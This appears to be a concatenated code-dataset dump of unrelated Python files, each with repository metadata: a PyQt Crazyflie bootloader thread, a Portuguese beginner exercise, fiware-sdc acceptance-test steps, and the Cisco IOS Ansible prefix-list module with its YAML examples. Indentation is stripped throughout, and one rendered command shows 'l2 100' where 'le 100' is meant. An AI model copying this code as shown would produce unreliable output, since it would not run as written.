# Input signals declaration (not sure it should be used like that...)
program = pyqtSignal(str, bool)
verify = pyqtSignal()
initiateColdBootSignal = pyqtSignal(str)
resetCopterSignal = pyqtSignal()
writeConfigSignal = pyqtSignal(int, int, float, float)
# Output signals declaration
programmed = pyqtSignal(bool)
verified = pyqtSignal()
statusChanged = pyqtSignal(str, int)
connectedSignal = pyqtSignal()
connectingSignal = pyqtSignal()
failed_signal = pyqtSignal(str)
disconnectedSignal = pyqtSignal()
updateConfigSignal = pyqtSignal(int, int, float, float)
updateCpuIdSignal = pyqtSignal(str)
radioSpeedPos = 2
def __init__(self):
super(CrazyloadThread, self).__init__()
self._bl = Bootloader()
self._bl.progress_cb = self.statusChanged.emit
# Make sure that the signals are handled by this thread event loop
self.moveToThread(self)
self.program.connect(self.programAction)
self.initiateColdBootSignal.connect(self.initiateColdBoot)
self.resetCopterSignal.connect(self.resetCopter)
def __del__(self):
self.quit()
self.wait()
def initiateColdBoot(self, linkURI):
self.connectingSignal.emit()
try:
success = self._bl.start_bootloader(warm_boot=False)
if not success:
self.failed_signal.emit("Could not connect to bootloader")
else:
self.connectedSignal.emit()
except Exception as e:
self.failed_signal.emit("{}".format(e))
def programAction(self, filename, verify):
targets = {}
if str(filename).endswith("bin"):
targets["stm32"] = ("fw",)
try:
self._bl.flash(str(filename), targets)
self.programmed.emit(True)
except Exception:
self.programmed.emit(False)
def resetCopter(self):
try:
self._bl.reset_to_firmware()
except Exception:
pass
self._bl.close()
self.disconnectedSignal.emit()
| 35.042553
| 79
| 0.646934
|
8a1af016c186610e90c65276ce4189d4c966f42d
| 286
|
py
|
Python
|
ex016.py
|
thaisouza30/Exercicios-Python3-Curso-em-Video
|
ec9ccf57fae7bd86ec7a80efb1df779dd2128154
|
[
"Apache-2.0"
] | 1
|
2021-02-01T17:22:11.000Z
|
2021-02-01T17:22:11.000Z
|
ex016.py
|
thaisouza30/Exercicios-Python3-Curso-em-Video
|
ec9ccf57fae7bd86ec7a80efb1df779dd2128154
|
[
"Apache-2.0"
] | null | null | null |
ex016.py
|
thaisouza30/Exercicios-Python3-Curso-em-Video
|
ec9ccf57fae7bd86ec7a80efb1df779dd2128154
|
[
"Apache-2.0"
] | null | null | null |
'''from math import trunc
num = float(input('Digite um número'))
print('O valor digitado foi {} e sua porção inteira é {}'.format(num, trunc(num)))'''
num = float(input('Digite um valor:'))
print('O valor digitado foi {} e a sua porção inteira é {}'.format(num, int(num)))
| 28.6
| 86
| 0.646853
|
344ae179c251286e00d5eaaf7d6127ca538a7817
| 1,914
|
py
|
Python
|
test/acceptance/e2e/install_product/steps.py
|
flopezag/fiware-sdc
|
44bacb77f252276fbf4ba5260218a1883319508f
|
[
"Apache-2.0"
] | null | null | null |
test/acceptance/e2e/install_product/steps.py
|
flopezag/fiware-sdc
|
44bacb77f252276fbf4ba5260218a1883319508f
|
[
"Apache-2.0"
] | null | null | null |
test/acceptance/e2e/install_product/steps.py
|
flopezag/fiware-sdc
|
44bacb77f252276fbf4ba5260218a1883319508f
|
[
"Apache-2.0"
] | null | null | null |
__author__ = 'jfernandez'
"""
Imports all steps already defined and implemented in 'install_product' feature
"""
from component.install_product.features.install_product import *
from commons.utils import wait_for_software_installed, generate_content_installed_by_product
from commons.fabric_utils import execute_content_in_file
@step(u'a installed product with name "([^"]*)" and release "([^"]*)"')
def installed_product(step, product_name, product_version):
a_created_product_with_name_group1(step, product_name, product_version)
i_install_the_product_in_the_vm(step)
the_task_is_performed(step)
@step(u'the task is performed')
def the_task_is_performed(step):
the_task_has_finished_with_status_group1(step, TASK_STATUS_VALUE_SUCCESS)
@step(u'the product is installed')
def the_product_is_installed(step):
world.file_name = PRODUCT_FILE_NAME_FORMAT.format(product_name=world.product_name,
product_version=world.product_version,
installator=world.cm_tool)
assert_true(wait_for_software_installed(status_to_be_finished=True, file_name=world.file_name),
"ERROR: SOFTWARE IS NOT INSTALLED")
@step(u'the product with attributes is installed')
def the_product_with_attributes_is_installed(step):
the_product_is_installed(step)
for attribute in world.instance_attributes:
assert_true(execute_content_in_file(world.file_name,
generate_content_installed_by_product(world.product_name,
world.product_version,
world.instance_attributes)),
"Attribute value not found in product installed [{}]".format(attribute[VALUE]))
| 43.5
| 110
| 0.667712
|
16161b9809017d4aca716bb3ab9f7f5f7e2d53f0
| 32,807
|
py
|
Python
|
venv/lib/python3.6/site-packages/ansible_collections/cisco/ios/plugins/modules/ios_prefix_lists.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | 1
|
2020-01-22T13:11:23.000Z
|
2020-01-22T13:11:23.000Z
|
venv/lib/python3.6/site-packages/ansible_collections/cisco/ios/plugins/modules/ios_prefix_lists.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | 12
|
2020-02-21T07:24:52.000Z
|
2020-04-14T09:54:32.000Z
|
venv/lib/python3.6/site-packages/ansible_collections/cisco/ios/plugins/modules/ios_prefix_lists.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2021 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
"""
The module file for cisco.ios_prefix_lists
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = """
module: ios_prefix_lists
short_description: Prefix Lists resource module
description:
- This module configures and manages the attributes of prefix list on Cisco IOS.
version_added: 2.2.0
author: Sumit Jaiswal (@justjais)
notes:
- Tested against Cisco IOSv Version 15.2 on VIRL
- This module works with connection C(network_cli).
See U(https://docs.ansible.com/ansible/latest/network/user_guide/platform_ios.html)
options:
config:
description: A list of configurations for Prefix lists.
type: list
elements: dict
suboptions:
afi:
description:
- The Address Family Indicator (AFI) for the prefix list.
type: str
choices: ['ipv4', 'ipv6']
prefix_lists:
description: List of Prefix-lists.
type: list
elements: dict
suboptions:
name:
description: Name of a prefix-list
type: str
description:
description: Prefix-list specific description
type: str
entries:
description: Prefix-lists supported params.
type: list
elements: dict
suboptions:
action:
description: Specify packets to be rejected or forwarded
type: str
choices: ['deny', 'permit']
sequence:
description: sequence number of an entry
type: int
description:
description:
- Prefix-list specific description
- Description param at entries level is DEPRECATED
- New Description is introduced at prefix_lists level, please
use the Description param defined at prefix_lists level instead of
Description param at entries level, as at this level description option
will get removed in a future release.
type: str
prefix:
description:
- IPv4 prefix <network>/<length>, e.g., A.B.C.D/nn
- IPv6 prefix <network>/<length>, e.g., X:X:X:X::X/<0-128>
type: str
ge:
description: Minimum prefix length to be matched
type: int
le:
description: Maximum prefix length to be matched
type: int
running_config:
description:
- This option is used only with state I(parsed).
- The value of this option should be the output received from the IOS device by
executing the command B(sh bgp).
- The state I(parsed) reads the configuration from C(running_config) option and
transforms it into Ansible structured data as per the resource module's argspec
and the value is then returned in the I(parsed) key within the result.
type: str
state:
description:
- The state the configuration should be left in
- The states I(merged) is the default state which merges the want and have config, but
for Prefix-List module as the IOS platform doesn't allow update of Prefix-List over an
pre-existing Prefix-List, same way Prefix-Lists resource module will error out for
respective scenario and only addition of new Prefix-List over new sequence will be
allowed with merge state.
- The states I(rendered), I(gathered) and I(parsed) does not perform any change
on the device.
- The state I(rendered) will transform the configuration in C(config) option to
platform specific CLI commands which will be returned in the I(rendered) key
within the result. For state I(rendered) active connection to remote host is
not required.
- The state I(gathered) will fetch the running configuration from device and transform
it into structured data in the format as per the resource module argspec and
the value is returned in the I(gathered) key within the result.
- The state I(parsed) reads the configuration from C(running_config) option and
transforms it into JSON format as per the resource module parameters and the
value is returned in the I(parsed) key within the result. The value of C(running_config)
option should be the same format as the output of command I(sh running-config
| section ^ip prefix-list|^ipv6 prefix-list) executed on device. For state I(parsed) active
connection to remote host is not required.
type: str
choices:
- merged
- replaced
- overridden
- deleted
- gathered
- parsed
- rendered
default: merged
"""
EXAMPLES = """
# Using deleted by Name
# Before state:
# -------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ip prefix-list 10 description this is test description
# ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15
# ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10
# ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15
# ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21
# ip prefix-list test description this is test
# ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15
# ip prefix-list test_prefix description this is for prefix-list
# ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15
# ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20
# ipv6 prefix-list test_ipv6 description this is ipv6 prefix-list
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
- name: Delete provided Prefix lists config by Prefix name
cisco.ios.ios_prefix_lists:
config:
- afi: ipv4
prefix_lists:
- name: 10
- name: test_prefix
state: deleted
# Commands Fired:
# ---------------
#
# "commands": [
# "no ip prefix-list 10",
# "no ip prefix-list test_prefix"
# ]
# After state:
# -------------
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ip prefix-list test description this is test
# ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15
# ipv6 prefix-list test_ipv6 description this is ipv6 prefix-list
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
# Using deleted by AFI
# Before state:
# -------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ip prefix-list 10 description this is test description
# ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15
# ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10
# ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15
# ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21
# ip prefix-list test description this is test
# ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15
# ip prefix-list test_prefix description this is for prefix-list
# ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15
# ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20
# ipv6 prefix-list test_ipv6 description this is ipv6 prefix-list
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
- name: Delete provided Prefix lists config by AFI
cisco.ios.ios_prefix_lists:
config:
- afi: ipv4
state: deleted
# Commands Fired:
# ---------------
#
# "commands": [
# "no ip prefix-list test",
# "no ip prefix-list 10",
# "no ip prefix-list test_prefix"
# ]
# After state:
# -------------
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ipv6 prefix-list test_ipv6 description this is ipv6 prefix-list
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
# Using deleted without any config passed (NOTE: This will delete all Prefix lists configuration from device)
# Before state:
# -------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ip prefix-list 10 description this is test description
# ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15
# ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10
# ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15
# ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21
# ip prefix-list test description this is test
# ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15
# ip prefix-list test_prefix description this is for prefix-list
# ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15
# ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20
# ipv6 prefix-list test_ipv6 description this is ipv6 prefix-list
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
- name: Delete all Prefix lists config
cisco.ios.ios_prefix_lists:
state: deleted
# Commands Fired:
# ---------------
#
# "commands": [
# "no ip prefix-list test",
# "no ip prefix-list 10",
# "no ip prefix-list test_prefix",
# "no ipv6 prefix-list test_ipv6"
# ]
# After state:
# -------------
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# router-ios#
# Using merged
# Before state:
# -------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ipv6 prefix-list test_ipv6 description this is ipv6
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
- name: Merge provided Prefix lists configuration
cisco.ios.ios_prefix_lists:
config:
- afi: ipv6
prefix_lists:
- name: test_ipv6
description: this is ipv6 merge test
entries:
- action: deny
prefix: 2001:DB8:0:4::/64
ge: 80
le: 100
sequence: 10
state: merged
# After state:
# -------------
#
# Play Execution fails, with error:
# Cannot update existing sequence 10 of Prefix Lists test_ipv6 with state merged.
# Please use state replaced or overridden.
# Before state:
# -------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ipv6 prefix-list test_ipv6 description this is ipv6
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
- name: Merge provided Prefix lists configuration
cisco.ios.ios_prefix_lists:
config:
- afi: ipv4
prefix_lists:
- name: 10
description: this is new merge test
entries:
- action: deny
prefix: 1.0.0.0/8
le: 15
sequence: 5
- action: deny
prefix: 35.0.0.0/8
ge: 10
sequence: 10
- action: deny
prefix: 12.0.0.0/8
ge: 15
sequence: 15
- action: deny
prefix: 14.0.0.0/8
ge: 20
le: 21
sequence: 20
- name: test
description: this is merge test
entries:
- action: deny
prefix: 12.0.0.0/8
ge: 15
sequence: 50
- name: test_prefix
description: this is for prefix-list
entries:
- action: deny
prefix: 35.0.0.0/8
ge: 10
le: 15
sequence: 5
- action: deny
prefix: 35.0.0.0/8
ge: 20
sequence: 10
- afi: ipv6
prefix_lists:
- name: test_ipv6
description: this is ipv6 merge test
entries:
- action: deny
prefix: 2001:DB8:0:4::/64
ge: 80
le: 100
sequence: 20
state: merged
# Commands Fired:
# ---------------
#
# "commands": [
# "ip prefix-list test description this is merge test",
# "ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15",
# "ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15",
# "ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10",
# "ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15",
# "ip prefix-list 10 description this is new merge test",
# "ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21",
# "ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20",
# "ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15",
# "ip prefix-list test_prefix description this is for prefix-list",
# "ipv6 prefix-list test_ipv6 seq 20 deny 2001:DB8:0:4::/64 ge 80 le 100",
# "ipv6 prefix-list test_ipv6 description this is ipv6 merge test"
# ]
# After state:
# -------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ip prefix-list 10 description this is new merge test
# ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15
# ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10
# ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15
# ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21
# ip prefix-list test description this is merge test
# ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15
# ip prefix-list test_prefix description this is for prefix-list
# ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15
# ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20
# ipv6 prefix-list test_ipv6 description this is ipv6 merge test
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80 le 100
# Using overridden
# Before state:
# -------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ip prefix-list 10 description this is test description
# ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15
# ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10
# ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15
# ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21
# ip prefix-list test description this is test
# ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15
# ip prefix-list test_prefix description this is for prefix-list
# ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15
# ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20
# ipv6 prefix-list test_ipv6 description this is ipv6 prefix-list
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
- name: Override provided Prefix lists configuration
cisco.ios.ios_prefix_lists:
config:
- afi: ipv4
prefix_lists:
- name: 10
description: this is override test
entries:
- action: deny
prefix: 12.0.0.0/8
ge: 15
sequence: 15
- action: deny
prefix: 14.0.0.0/8
ge: 20
le: 21
sequence: 20
- name: test_override
description: this is override test
entries:
- action: deny
prefix: 35.0.0.0/8
ge: 20
sequence: 10
- afi: ipv6
prefix_lists:
- name: test_ipv6
description: this is ipv6 override test
entries:
- action: deny
prefix: 2001:DB8:0:4::/64
ge: 80
le: 100
sequence: 10
state: overridden
# Commands Fired:
# ---------------
#
# "commands": [
# "no ip prefix-list test",
# "no ip prefix-list test_prefix",
# "ip prefix-list 10 description this is override test",
# "no ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10",
# "no ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15",
# "ip prefix-list test_override seq 10 deny 35.0.0.0/8 ge 20",
# "ip prefix-list test_override description this is override test",
# "no ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80",
# "ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80 le 100",
# "ipv6 prefix-list test_ipv6 description this is ipv6 override test"
# ]
# After state:
# -------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ip prefix-list 10 description this is override test
# ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15
# ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21
# ip prefix-list test_override description this is override test
# ip prefix-list test_override seq 10 deny 35.0.0.0/8 ge 20
# ipv6 prefix-list test_ipv6 description this is ipv6 override test
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80 le 100
# Using replaced
# Before state:
# -------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ip prefix-list 10 description this is test description
# ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15
# ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10
# ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15
# ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21
# ip prefix-list test description this is test
# ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15
# ip prefix-list test_prefix description this is for prefix-list
# ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15
# ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20
# ipv6 prefix-list test_ipv6 description this is ipv6 prefix-list
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
- name: Replaced provided Prefix lists configuration
cisco.ios.ios_prefix_lists:
config:
- afi: ipv4
prefix_lists:
- name: 10
description: this is replace test
entries:
- action: deny
prefix: 12.0.0.0/8
ge: 15
sequence: 15
- action: deny
prefix: 14.0.0.0/8
ge: 20
le: 21
sequence: 20
- name: test_replace
description: this is replace test
entries:
- action: deny
prefix: 35.0.0.0/8
ge: 20
sequence: 10
- afi: ipv6
prefix_lists:
- name: test_ipv6
description: this is ipv6 replace test
entries:
- action: deny
prefix: 2001:DB8:0:4::/64
ge: 80
le: 100
sequence: 10
state: replaced
# Commands Fired:
# ---------------
# "commands": [
# "ip prefix-list 10 description this is replace test",
# "no ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10",
# "no ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15",
# "ip prefix-list test_replace seq 10 deny 35.0.0.0/8 ge 20",
# "ip prefix-list test_replace description this is replace test",
# "no ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80",
# "ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80 le 100",
# "ipv6 prefix-list test_ipv6 description this is ipv6 replace test"
# ]
# After state:
# -------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ip prefix-list 10 description this is replace test
# ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15
# ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21
# ip prefix-list test description this is test
# ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15
# ip prefix-list test_prefix description this is for prefix-list
# ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15
# ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20
# ip prefix-list test_replace description this is replace test
# ip prefix-list test_replace seq 10 deny 35.0.0.0/8 ge 20
# ipv6 prefix-list test_ipv6 description this is ipv6 replace test
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80 le 100
# Using Gathered
# Before state:
# -------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ip prefix-list 10 description this is test description
# ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15
# ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10
# ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15
# ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21
# ip prefix-list test description this is test
# ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15
# ip prefix-list test_prefix description this is for prefix-list
# ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15
# ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20
# ipv6 prefix-list test_ipv6 description this is ipv6 prefix-list
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
- name: Gather Prefix lists provided configurations
cisco.ios.ios_prefix_lists:
config:
state: gathered
# Module Execution Result:
# ------------------------
#
# "gathered": [
# {
# "afi": "ipv4",
# "prefix_lists": [
# {
# "description": "this is test description"
# "entries": [
# {
# "action": "deny",
# "le": 15,
# "prefix": "1.0.0.0/8",
# "sequence": 5
# },
# {
# "action": "deny",
# "ge": 10,
# "prefix": "35.0.0.0/8",
# "sequence": 10
# },
# {
# "action": "deny",
# "ge": 15,
# "prefix": "12.0.0.0/8",
# "sequence": 15
# },
# {
# "action": "deny",
# "ge": 20,
# "le": 21,
# "prefix": "14.0.0.0/8",
# "sequence": 20
# }
# ],
# "name": "10"
# },
# {
# "description": "this is test"
# "entries": [
# {
# "action": "deny",
# "ge": 15,
# "prefix": "12.0.0.0/8",
# "sequence": 50
# }
# ],
# "name": "test"
# },
# {
# "description": "this is for prefix-list"
# "entries": [
# {
# "action": "deny",
# "ge": 10,
# "le": 15,
# "prefix": "35.0.0.0/8",
# "sequence": 5
# },
# {
# "action": "deny",
# "ge": 20,
# "prefix": "35.0.0.0/8",
# "sequence": 10
# }
# ],
# "name": "test_prefix"
# }
# ]
# },
# {
# "afi": "ipv6",
# "prefix_lists": [
# {
# "description": "this is ipv6 prefix-list"
# "entries": [
# {
# "action": "deny",
# "ge": 80,
# "prefix": "2001:DB8:0:4::/64",
# "sequence": 10
# }
# ],
# "name": "test_ipv6"
# }
# ]
# }
# ]
# After state:
# ------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ip prefix-list 10 description this is test description
# ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15
# ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10
# ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15
# ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21
# ip prefix-list test description this is test
# ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15
# ip prefix-list test_prefix description this is for prefix-list
# ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15
# ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20
# ipv6 prefix-list test_ipv6 description this is ipv6 prefix-list
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
# Using Rendered
- name: Render the commands for provided configuration
cisco.ios.ios_prefix_lists:
config:
- afi: ipv4
prefix_lists:
- name: 10
description: this is new merge test
entries:
- action: deny
prefix: 1.0.0.0/8
le: 15
sequence: 5
- action: deny
prefix: 35.0.0.0/8
ge: 10
sequence: 10
- action: deny
prefix: 12.0.0.0/8
ge: 15
sequence: 15
- action: deny
prefix: 14.0.0.0/8
ge: 20
le: 21
sequence: 20
- name: test
description: this is merge test
entries:
- action: deny
prefix: 12.0.0.0/8
ge: 15
sequence: 50
- name: test_prefix
description: this is for prefix-list
entries:
- action: deny
prefix: 35.0.0.0/8
ge: 10
le: 15
sequence: 5
- action: deny
prefix: 35.0.0.0/8
ge: 20
sequence: 10
- afi: ipv6
prefix_lists:
- name: test_ipv6
description: this is ipv6 merge test
entries:
- action: deny
prefix: 2001:DB8:0:4::/64
ge: 80
le: 100
sequence: 10
state: rendered
# Module Execution Result:
# ------------------------
#
# "rendered": [
# "ip prefix-list test description this is test",
# "ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15",
# "ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15",
# "ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10",
# "ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15",
# "ip prefix-list 10 description this is test description",
# "ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21",
# "ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20",
# "ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15",
# "ip prefix-list test_prefix description this is for prefix-list",
# "ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80 l2 100",
# "ipv6 prefix-list test_ipv6 description this is ipv6 prefix-list"
# ]
# Using Parsed
# File: parsed.cfg
# ----------------
#
# ip prefix-list 10 description this is test description
# ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15
# ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10
# ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15
# ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21
# ip prefix-list test description this is test
# ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15
# ip prefix-list test_prefix description this is for prefix-list
# ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15
# ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20
# ipv6 prefix-list test_ipv6 description this is ipv6 prefix-list
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
- name: Parse the provided configuration with the existing running configuration
cisco.ios.ios_prefix_lists:
running_config: "{{ lookup('file', 'parsed.cfg') }}"
state: parsed
# Module Execution Result:
# ------------------------
#
# "parsed": [
# {
# "afi": "ipv4",
# "prefix_lists": [
# {
# "description": "this is test description"
# "entries": [
# {
# "action": "deny",
# "le": 15,
# "prefix": "1.0.0.0/8",
# "sequence": 5
# },
# {
# "action": "deny",
# "ge": 10,
# "prefix": "35.0.0.0/8",
# "sequence": 10
# },
# {
# "action": "deny",
# "ge": 15,
# "prefix": "12.0.0.0/8",
# "sequence": 15
# },
# {
# "action": "deny",
# "ge": 20,
# "le": 21,
# "prefix": "14.0.0.0/8",
# "sequence": 20
# }
# ],
# "name": "10"
# },
# {
# "description": "this is test"
# "entries": [
# {
# "action": "deny",
# "ge": 15,
# "prefix": "12.0.0.0/8",
# "sequence": 50
# }
# ],
# "name": "test"
# },
# {
# "description": "this is for prefix-list"
# "entries": [
# {
# "action": "deny",
# "ge": 10,
# "le": 15,
# "prefix": "35.0.0.0/8",
# "sequence": 5
# },
# {
# "action": "deny",
# "ge": 20,
# "prefix": "35.0.0.0/8",
# "sequence": 10
# }
# ],
# "name": "test_prefix"
# }
# ]
# },
# {
# "afi": "ipv6",
# "prefix_lists": [
# {
# "description": "this is ipv6 prefix-list"
# "entries": [
# {
# "action": "deny",
# "ge": 80,
# "prefix": "2001:DB8:0:4::/64",
# "sequence": 10
# }
# ],
# "name": "test_ipv6"
# }
# ]
# }
# ]
"""
RETURN = """
before:
description: The configuration prior to the model invocation.
returned: always
sample: >
The configuration returned will always be in the same format
of the parameters above.
type: list
after:
description: The resulting configuration model invocation.
returned: when changed
sample: >
The configuration returned will always be in the same format
of the parameters above.
type: list
commands:
description: The set of commands pushed to the remote device.
returned: always
type: list
sample: ['ip prefix-list 10 description this is test description', 'ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15']
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.cisco.ios.plugins.module_utils.network.ios.argspec.prefix_lists.prefix_lists import (
Prefix_listsArgs,
)
from ansible_collections.cisco.ios.plugins.module_utils.network.ios.config.prefix_lists.prefix_lists import (
Prefix_lists,
)
def main():
"""
Main entry point for module execution
:returns: the result form module invocation
"""
module = AnsibleModule(
argument_spec=Prefix_listsArgs.argument_spec,
mutually_exclusive=[["config", "running_config"]],
required_if=[
["state", "merged", ["config"]],
["state", "replaced", ["config"]],
["state", "overridden", ["config"]],
["state", "rendered", ["config"]],
["state", "parsed", ["running_config"]],
],
supports_check_mode=True,
)
result = Prefix_lists(module).execute_module()
module.exit_json(**result)
if __name__ == "__main__":
main()
| 35.621064
| 116
| 0.531563
|
00c6a6c9fe1c03a0f1587f3acbd988ea90a6d088
| 2,657
|
py
|
Python
|
preprocess.py
|
yoojungsun0/multi_emotional_tacotron
